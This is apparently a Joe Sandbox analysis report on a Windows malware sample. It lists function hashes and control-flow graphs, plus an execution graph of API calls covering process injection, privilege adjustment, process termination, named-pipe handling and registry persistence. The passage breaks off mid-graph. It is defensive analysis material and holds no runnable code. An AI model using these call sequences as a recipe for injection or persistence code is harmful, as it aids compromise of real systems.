                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2070327807.00007FF7EB901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EB900000, based on PE: true
                                                                          • Associated: 00000000.00000002.2070271600.00007FF7EB900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2070380475.00007FF7EB90B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2070422051.00007FF7EB90E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2070466176.00007FF7EB90F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2071523893.00007FF7EBB8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2071609340.00007FF7EBBC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2071651119.00007FF7EBBC5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7eb900000_nW2oopMIdg.jbxd
                                                                          Similarity
                                                                          • API ID: wcslen$wcscatwcscpywcsncmp
                                                                          • String ID: 0$X$`
                                                                          • API String ID: 597572034-2527496196
                                                                          • Opcode ID: 98185c13f6d2e375cf892135551cf39061725b7e67d8172754d23c2b4611d0ec
                                                                          • Instruction ID: 4e06bdd7689279e5e4ab96d50153c8d1cff1ca51a20ba54ff467a5bffad193cc
                                                                          • Opcode Fuzzy Hash: 98185c13f6d2e375cf892135551cf39061725b7e67d8172754d23c2b4611d0ec
                                                                          • Instruction Fuzzy Hash: 7B02A132908B8681E761DB19E8403AAFBA0FB85798F804236EA9C477F5DF7CD145C751
                                                                          Function 00007FF7EB903352 Relevance: 16.7, APIs: 6, Strings: 5, Instructions: 205COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2070327807.00007FF7EB901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EB900000, based on PE: true
                                                                          • Associated: 00000000.00000002.2070271600.00007FF7EB900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2070380475.00007FF7EB90B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2070422051.00007FF7EB90E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2070466176.00007FF7EB90F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2071523893.00007FF7EBB8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2071609340.00007FF7EBBC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2071651119.00007FF7EBBC5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7eb900000_nW2oopMIdg.jbxd
                                                                          Similarity
                                                                          • API ID: wcscatwcscpywcslen
                                                                          • String ID: $0$0$@$@
                                                                          • API String ID: 3623275624-1413854666
                                                                          • Opcode ID: b0127d468d46c267b9460b4f0b1c573224c770eb45ce2e4a03525f6280a39a82
                                                                          • Instruction ID: 242870823fd49b2a4c6a896fd4354a8cee0761ebd6e5bf685bff24b2c69aa0fa
                                                                          • Opcode Fuzzy Hash: b0127d468d46c267b9460b4f0b1c573224c770eb45ce2e4a03525f6280a39a82
                                                                          • Instruction Fuzzy Hash: 27B18E2190C6C685F361EB19E4553AAFBA0FF84348F804136EACC566B5DF7CD189CB62
                                                                          Function 00007FF7EB901BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • VirtualQuery.KERNEL32(?,?,?,?,00007FF7EB90C8F4,00007FF7EB90C8F4,?,?,00007FF7EB900000,?,00007FF7EB901991), ref: 00007FF7EB901C63
                                                                          • VirtualProtect.KERNEL32(?,?,?,?,00007FF7EB90C8F4,00007FF7EB90C8F4,?,?,00007FF7EB900000,?,00007FF7EB901991), ref: 00007FF7EB901CC7
                                                                          • memcpy.MSVCRT ref: 00007FF7EB901CE0
                                                                          • GetLastError.KERNEL32(?,?,?,?,00007FF7EB90C8F4,00007FF7EB90C8F4,?,?,00007FF7EB900000,?,00007FF7EB901991), ref: 00007FF7EB901D23
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2070327807.00007FF7EB901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EB900000, based on PE: true
                                                                          • Associated: 00000000.00000002.2070271600.00007FF7EB900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2070380475.00007FF7EB90B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2070422051.00007FF7EB90E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2070466176.00007FF7EB90F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2071523893.00007FF7EBB8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2071609340.00007FF7EBBC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2071651119.00007FF7EBBC5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7eb900000_nW2oopMIdg.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                          • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                          • API String ID: 2595394609-2123141913
                                                                          • Opcode ID: ddbdcf1874e9ea71757a48b7d804bab9f2fa45dded7038c380b0ba63e0422925
                                                                          • Instruction ID: c87d15013ca51edf5a812688867b0ea87cf27c9a02d4e34bd5ba9708c60adeac
                                                                          • Opcode Fuzzy Hash: ddbdcf1874e9ea71757a48b7d804bab9f2fa45dded7038c380b0ba63e0422925
                                                                          • Instruction Fuzzy Hash: 8C418E71A09662C1EA51AB4ED8847B9ABA0FF45B88F944033EE0D433B1DE3CE545C322
                                                                          Function 00007FF7EB902104 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2070327807.00007FF7EB901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EB900000, based on PE: true
                                                                          • Associated: 00000000.00000002.2070271600.00007FF7EB900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2070380475.00007FF7EB90B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2070422051.00007FF7EB90E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2070466176.00007FF7EB90F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2071523893.00007FF7EBB8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2071609340.00007FF7EBBC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2071651119.00007FF7EBBC5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7eb900000_nW2oopMIdg.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$DeleteEnterErrorLastLeaveValue
                                                                          • String ID:
                                                                          • API String ID: 926137887-0
                                                                          • Opcode ID: 613fdf5728c7ed6876bd790cebaa614c9071348df8fdca610d58b176e96f82e5
                                                                          • Instruction ID: c1447e9aaf68bb28e1a195582ba4ea0cb2843a6d97672dfb166ed6bcd891fc1d
                                                                          • Opcode Fuzzy Hash: 613fdf5728c7ed6876bd790cebaa614c9071348df8fdca610d58b176e96f82e5
                                                                          • Instruction Fuzzy Hash: 2421EA21E0A512C2FA59BB5DE980378FA60BF16B98FD44433C94D476B4DF3CA885C326
                                                                          Function 00007FF7EB901E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 316 7ff7eb901e10-7ff7eb901e2d 317 7ff7eb901e2f-7ff7eb901e38 316->317 318 7ff7eb901e3e-7ff7eb901e48 316->318 317->318 319 7ff7eb901f60-7ff7eb901f69 317->319 320 7ff7eb901ea3-7ff7eb901ea8 318->320 321 7ff7eb901e4a-7ff7eb901e53 318->321 320->319 324 7ff7eb901eae-7ff7eb901eb3 320->324 322 7ff7eb901e55-7ff7eb901e60 321->322 323 7ff7eb901ecc-7ff7eb901ed1 321->323 322->320 327 7ff7eb901f23-7ff7eb901f2d 323->327 328 7ff7eb901ed3-7ff7eb901ee2 signal 323->328 325 7ff7eb901eb5-7ff7eb901eba 324->325 326 7ff7eb901efb-7ff7eb901f0a call 7ff7eb909ff0 324->326 325->319 333 7ff7eb901ec0 325->333 326->327 337 7ff7eb901f0c-7ff7eb901f10 326->337 331 7ff7eb901f43-7ff7eb901f45 327->331 332 7ff7eb901f2f-7ff7eb901f3f 327->332 328->327 329 7ff7eb901ee4-7ff7eb901ee8 328->329 334 7ff7eb901f4e-7ff7eb901f53 329->334 335 7ff7eb901eea-7ff7eb901ef9 signal 329->335 331->319 332->331 333->327 338 7ff7eb901f5a 334->338 335->319 339 7ff7eb901f55 337->339 340 7ff7eb901f12-7ff7eb901f21 signal 337->340 338->319 339->338 340->319
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2070327807.00007FF7EB901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EB900000, based on PE: true
                                                                          • Associated: 00000000.00000002.2070271600.00007FF7EB900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2070380475.00007FF7EB90B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2070422051.00007FF7EB90E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2070466176.00007FF7EB90F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2071523893.00007FF7EBB8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2071609340.00007FF7EBBC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2071651119.00007FF7EBBC5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7eb900000_nW2oopMIdg.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: CCG
                                                                          • API String ID: 0-1584390748
                                                                          • Opcode ID: 8ffd1e83da114adb7a12425d872c4067a8ab9974e88a3fba3c75f53be1714557
                                                                          • Instruction ID: b543e32c33d51a9af574343aa18ce874f3ac94c4056997ff6c03990d5105e950
                                                                          • Opcode Fuzzy Hash: 8ffd1e83da114adb7a12425d872c4067a8ab9974e88a3fba3c75f53be1714557
                                                                          • Instruction Fuzzy Hash: A7216021E09126C1FA65625D95903799981EF8576CFB88137FB0D432F5DE3CAC818263
                                                                          Function 00007FF7EB9038E0 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2070327807.00007FF7EB901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EB900000, based on PE: true
                                                                          • Associated: 00000000.00000002.2070271600.00007FF7EB900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2070380475.00007FF7EB90B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2070422051.00007FF7EB90E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2070466176.00007FF7EB90F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2071523893.00007FF7EBB8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2071609340.00007FF7EBBC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2071651119.00007FF7EBBC5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7eb900000_nW2oopMIdg.jbxd
                                                                          Similarity
                                                                          • API ID: wcslen
                                                                          • String ID: 0$@
                                                                          • API String ID: 4088430540-1545510068
                                                                          • Opcode ID: 8bc87b3cca2c78adc28c7b1354bc797d6113aeb12ee74f16880f0486ba838264
                                                                          • Instruction ID: 2eeda87b5435b452d2c454f961b0a158f423ce881c7d93c56a2afe55c06c7ddc
                                                                          • Opcode Fuzzy Hash: 8bc87b3cca2c78adc28c7b1354bc797d6113aeb12ee74f16880f0486ba838264
                                                                          • Instruction Fuzzy Hash: 8E115C22528681C2E3509B18F44579AF774EFD8398F905125F68D83BA9EF7DC18ACB11
                                                                          Function 00007FF7EB901880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 349 7ff7eb901880-7ff7eb90189c 350 7ff7eb9018a2-7ff7eb9018f9 call 7ff7eb902420 call 7ff7eb902660 349->350 351 7ff7eb901a0f-7ff7eb901a1f 349->351 350->351 356 7ff7eb9018ff-7ff7eb901910 350->356 357 7ff7eb901912-7ff7eb90191c 356->357 358 7ff7eb90193e-7ff7eb901941 356->358 359 7ff7eb90191e-7ff7eb901929 357->359 360 7ff7eb90194d-7ff7eb901954 357->360 358->360 361 7ff7eb901943-7ff7eb901947 358->361 359->360 362 7ff7eb90192b-7ff7eb90193a 359->362 364 7ff7eb901956-7ff7eb901961 360->364 365 7ff7eb90199e-7ff7eb9019a6 360->365 361->360 363 7ff7eb901a20-7ff7eb901a26 361->363 362->358 366 7ff7eb901a2c-7ff7eb901a37 363->366 367 7ff7eb901b87-7ff7eb901b98 call 7ff7eb901d40 363->367 369 7ff7eb901970-7ff7eb90199c call 7ff7eb901ba0 364->369 365->351 368 7ff7eb9019a8-7ff7eb9019c1 365->368 366->365 370 7ff7eb901a3d-7ff7eb901a5f 366->370 371 7ff7eb9019df-7ff7eb9019e7 368->371 369->365 374 7ff7eb901a7d-7ff7eb901a97 370->374 375 7ff7eb9019d0-7ff7eb9019dd 371->375 376 7ff7eb9019e9-7ff7eb901a0d VirtualProtect 371->376 379 7ff7eb901b74-7ff7eb901b82 call 7ff7eb901d40 374->379 380 7ff7eb901a9d-7ff7eb901afa 374->380 375->351 375->371 376->375 381 7ff7eb901a70-7ff7eb901a77 376->381 379->367 386 7ff7eb901b22-7ff7eb901b26 380->386 387 7ff7eb901afc-7ff7eb901b0e 380->387 381->365 381->374 386->381 390 7ff7eb901b2c-7ff7eb901b30 386->390 388 7ff7eb901b10-7ff7eb901b20 387->388 389 7ff7eb901b5c-7ff7eb901b6f call 7ff7eb901d40 387->389 388->386 388->389 389->379 390->381 391 7ff7eb901b36-7ff7eb901b53 call 7ff7eb901ba0 390->391 391->389
                                                                          APIs
                                                                          • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7EB901247), ref: 00007FF7EB9019F9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2070327807.00007FF7EB901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EB900000, based on PE: true
                                                                          • Associated: 00000000.00000002.2070271600.00007FF7EB900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2070380475.00007FF7EB90B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2070422051.00007FF7EB90E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2070466176.00007FF7EB90F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2071523893.00007FF7EBB8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2071609340.00007FF7EBBC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2071651119.00007FF7EBBC5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7eb900000_nW2oopMIdg.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                          • API String ID: 544645111-395989641
                                                                          • Opcode ID: f047dfd43f2b20f4878765ae852215213f87511333d9653e63cf908346f9a17d
                                                                          • Instruction ID: a945961bdc89a6fc43d9a2692c3927981705fff8f28c33ae0f06923db37f23ca
                                                                          • Opcode Fuzzy Hash: f047dfd43f2b20f4878765ae852215213f87511333d9653e63cf908346f9a17d
                                                                          • Instruction Fuzzy Hash: 85516021E09556D6EB10AB29E850778BB61BF15B98F944133E91C077B9CF3CE486C722
                                                                          Function 00007FF7EB901800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 395 7ff7eb901800-7ff7eb901810 396 7ff7eb901824 395->396 397 7ff7eb901812-7ff7eb901822 395->397 398 7ff7eb90182b-7ff7eb901867 call 7ff7eb902290 fprintf 396->398 397->398
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2070327807.00007FF7EB901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EB900000, based on PE: true
                                                                          • Associated: 00000000.00000002.2070271600.00007FF7EB900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2070380475.00007FF7EB90B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2070422051.00007FF7EB90E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2070466176.00007FF7EB90F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2071523893.00007FF7EBB8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2071609340.00007FF7EBBC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2071651119.00007FF7EBBC5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7eb900000_nW2oopMIdg.jbxd
                                                                          Similarity
                                                                          • API ID: fprintf
                                                                          • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                          • API String ID: 383729395-3474627141
                                                                          • Opcode ID: 1c04987d95cc1312a9d89c4e69c05c1118544e67408b6cf4f97d1d5589193830
                                                                          • Instruction ID: 0c4f0230a265301d99cae29a8f909d27409f185c5fbeb1d53671ee664bf078d6
                                                                          • Opcode Fuzzy Hash: 1c04987d95cc1312a9d89c4e69c05c1118544e67408b6cf4f97d1d5589193830
                                                                          • Instruction Fuzzy Hash: ABF0C211E1CA45C2E250BB6CA9512B9E761EB493C8F90D232EE4D63261DF3CE182C311
                                                                          Function 00007FF7EB90219E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2070327807.00007FF7EB901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EB900000, based on PE: true
                                                                          • Associated: 00000000.00000002.2070271600.00007FF7EB900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2070380475.00007FF7EB90B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2070422051.00007FF7EB90E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2070466176.00007FF7EB90F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2071523893.00007FF7EBB8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2071609340.00007FF7EBBC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2071651119.00007FF7EBBC5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7eb900000_nW2oopMIdg.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                          • String ID:
                                                                          • API String ID: 682475483-0
                                                                          • Opcode ID: 5eff3f75befce3e92e47b05016d9c5d0d24caf54b52fc201209ce42e40f93eef
                                                                          • Instruction ID: df6e8438e25c1fea733c9b42806139d0697a85981e0fdd237cd15481e46b3518
                                                                          • Opcode Fuzzy Hash: 5eff3f75befce3e92e47b05016d9c5d0d24caf54b52fc201209ce42e40f93eef
                                                                          • Instruction Fuzzy Hash: 3601EC25A0E512C2FA59AB5DED44378FA60BF09B94FC44433CA0D576B4DF3CA995C322

                                                                          Execution Graph

                                                                          Execution Coverage:45.4%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:40.1%
                                                                          Total number of Nodes:227
                                                                          Total number of Limit Nodes:25
                                                                          execution_graph 522 140002524 523 140002531 522->523 524 140002539 522->524 525 1400010c0 30 API calls 523->525 525->524 383 140002bf8 384 140002c05 383->384 386 140002c25 ConnectNamedPipe 384->386 387 140002c1a Sleep 384->387 393 140001b54 AllocateAndInitializeSid 384->393 388 140002c83 Sleep 386->388 389 140002c34 ReadFile 386->389 387->384 391 140002c8e DisconnectNamedPipe 388->391 390 140002c57 WriteFile 389->390 389->391 390->391 391->386 394 140001bb1 SetEntriesInAclW 393->394 395 140001c6f 393->395 394->395 396 140001bf5 LocalAlloc 394->396 395->384 396->395 397 140001c09 InitializeSecurityDescriptor 396->397 397->395 398 140001c19 SetSecurityDescriptorDacl 397->398 398->395 399 140001c30 CreateNamedPipeW 398->399 399->395 400 140002258 403 14000226c 400->403 427 140001f2c 403->427 406 140001f2c 14 API calls 407 14000228f GetCurrentProcessId OpenProcess 406->407 408 140002321 FindResourceExA 407->408 409 1400022af OpenProcessToken 407->409 412 140002341 SizeofResource 408->412 413 140002261 ExitProcess 408->413 410 1400022c3 LookupPrivilegeValueW 409->410 411 140002318 CloseHandle 409->411 410->411 414 1400022da AdjustTokenPrivileges 410->414 411->408 412->413 415 14000235a LoadResource 412->415 414->411 416 140002312 GetLastError 414->416 415->413 417 14000236e LockResource GetCurrentProcessId 415->417 416->411 441 1400017ec GetProcessHeap HeapAlloc 417->441 419 14000238b RegCreateKeyExW 420 140002489 CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 419->420 421 1400023cc ConvertStringSecurityDescriptorToSecurityDescriptorW 419->421 422 14000250f SleepEx 420->422 423 1400023f4 RegSetKeySecurity LocalFree 421->423 424 14000240e RegCreateKeyExW 421->424 422->422 423->424 425 140002448 GetCurrentProcessId RegSetValueExW RegCloseKey 424->425 426 14000247f RegCloseKey 424->426 425->426 426->420 428 140001f35 StrCpyW StrCatW GetModuleHandleW 427->428 429 1400020ff 427->429 428->429 430 140001f86 GetCurrentProcess K32GetModuleInformation 428->430 429->406 431 1400020f6 FreeLibrary 430->431 432 140001fb6 CreateFileW 430->432 431->429 432->431 433 140001feb CreateFileMappingW 432->433 434 140002014 MapViewOfFile 433->434 435 1400020ed CloseHandle 433->435 436 1400020e4 CloseHandle 434->436 437 140002037 434->437 435->431 436->435 437->436 438 140002050 lstrcmpiA 437->438 440 14000208e 437->440 438->437 439 140002090 VirtualProtect VirtualProtect 438->439 439->436 440->436 447 1400014d8 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 441->447 443 140001885 GetProcessHeap HeapFree 444 140001830 444->443 445 140001851 OpenProcess 444->445 445->444 446 140001867 TerminateProcess CloseHandle 445->446 446->444 448 140001565 447->448 449 14000162f GetProcessHeap HeapFree GetProcessHeap HeapFree 447->449 448->449 450 14000157a OpenProcess 448->450 452 14000161a CloseHandle 448->452 453 1400015c9 ReadProcessMemory 448->453 449->444 450->448 451 140001597 K32EnumProcessModules 450->451 451->448 451->452 452->448 453->448 454 140002b38 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 455 140002b8e K32EnumProcesses 454->455 456 140002beb Sleep 455->456 458 140002ba3 455->458 456->455 457 140002bdc 457->456 458->457 460 140002540 458->460 461 140002558 460->461 462 14000254d 460->462 461->458 464 1400010c0 462->464 502 1400018ac OpenProcess 464->502 467 1400014ba 467->461 468 140001122 OpenProcess 468->467 469 14000113e OpenProcess 468->469 470 140001161 K32GetModuleFileNameExW 469->470 471 1400011fd NtQueryInformationProcess 469->471 472 1400011aa CloseHandle 470->472 473 14000117a PathFindFileNameW lstrlenW 470->473 474 1400014b1 CloseHandle 471->474 475 140001224 471->475 472->471 477 1400011b8 472->477 473->472 476 140001197 StrCpyW 473->476 474->467 475->474 478 140001230 OpenProcessToken 475->478 476->472 477->471 479 1400011d8 StrCmpIW 477->479 478->474 480 14000124e GetTokenInformation 478->480 479->474 479->477 481 1400012f1 480->481 482 140001276 GetLastError 480->482 483 1400012f8 CloseHandle 481->483 482->481 484 140001281 LocalAlloc 482->484 483->474 489 14000130c 483->489 484->481 485 140001297 GetTokenInformation 484->485 486 1400012df 485->486 487 1400012bf GetSidSubAuthorityCount GetSidSubAuthority 485->487 488 1400012e6 LocalFree 486->488 487->488 488->483 489->474 490 14000139b StrStrA 489->490 491 1400013c3 489->491 490->489 492 1400013c8 490->492 491->474 492->474 493 1400013f3 VirtualAllocEx 492->493 493->474 494 140001420 WriteProcessMemory 493->494 494->474 495 14000143b 494->495 507 14000211c 495->507 497 14000145b 497->474 498 140001478 WaitForSingleObject 497->498 501 140001471 CloseHandle 497->501 500 140001487 GetExitCodeThread 498->500 498->501 500->501 501->474 503 14000110e 502->503 504 1400018d8 IsWow64Process 502->504 503->467 503->468 505 1400018f8 CloseHandle 504->505 506 1400018ea 504->506 505->503 506->505 510 140001914 GetModuleHandleA 507->510 511 140001934 GetProcAddress 510->511 512 14000193d 510->512 511->512 513 1400021d0 514 1400021dd 513->514 515 140001b54 6 API calls 514->515 516 1400021f2 Sleep 514->516 517 1400021fd ConnectNamedPipe 514->517 515->514 516->514 518 140002241 Sleep 517->518 519 14000220c ReadFile 517->519 520 14000224c DisconnectNamedPipe 518->520 519->520 521 14000222f 519->521 520->517 521->520 526 140002560 527 140002592 526->527 528 14000273a 526->528 529 1400026c6 GetProcessHeap HeapAlloc K32EnumProcesses 527->529 530 140002598 527->530 531 140002748 528->531 532 14000297e ReadFile 528->532 533 140002633 529->533 535 140002704 529->535 536 1400025a5 530->536 537 1400026bd ExitProcess 530->537 538 140002751 531->538 539 140002974 531->539 532->533 534 1400029a8 532->534 534->533 547 1400018ac 3 API calls 534->547 535->533 549 1400010c0 30 API calls 535->549 543 1400025ae 536->543 544 140002660 RegOpenKeyExW 536->544 540 140002919 538->540 541 14000275c 538->541 542 14000175c 22 API calls 539->542 548 140001944 ReadFile 540->548 545 140002761 541->545 546 14000279d 541->546 542->533 543->533 559 1400025cb ReadFile 543->559 550 1400026a1 544->550 551 14000268d RegDeleteValueW 544->551 545->533 608 14000217c 545->608 611 140001944 546->611 552 1400029c7 547->552 554 140002928 548->554 549->535 595 1400019c4 SysAllocString SysAllocString CoInitializeEx 550->595 551->550 552->533 563 1400029db GetProcessHeap HeapAlloc 552->563 564 140002638 552->564 554->533 566 140001944 ReadFile 554->566 558 1400026a6 603 14000175c GetProcessHeap HeapAlloc 558->603 559->533 561 1400025f5 559->561 561->533 573 1400018ac 3 API calls 561->573 569 1400014d8 13 API calls 563->569 575 140002a90 4 API calls 564->575 565 1400027b4 ReadFile 565->533 570 1400027dc 565->570 571 14000293f 566->571 586 140002a14 569->586 570->533 576 1400027e9 GetProcessHeap HeapAlloc ReadFile 570->576 571->533 577 140002947 ShellExecuteW 571->577 579 140002614 573->579 575->533 581 14000290b GetProcessHeap 576->581 582 14000282d 576->582 577->533 579->533 579->564 585 140002624 579->585 580 140002a49 GetProcessHeap 583 140002a52 HeapFree 580->583 581->583 582->581 587 140002881 lstrlenW GetProcessHeap HeapAlloc 582->587 588 14000285e 582->588 583->533 589 1400010c0 30 API calls 585->589 586->580 635 1400016cc 586->635 629 140002a90 CreateFileW 587->629 588->581 615 140001c88 588->615 589->533 596 140001a11 CoInitializeSecurity 595->596 597 140001b2c SysFreeString SysFreeString 595->597 598 140001a59 CoCreateInstance 596->598 599 140001a4d 596->599 597->558 600 140001b26 CoUninitialize 598->600 601 140001a88 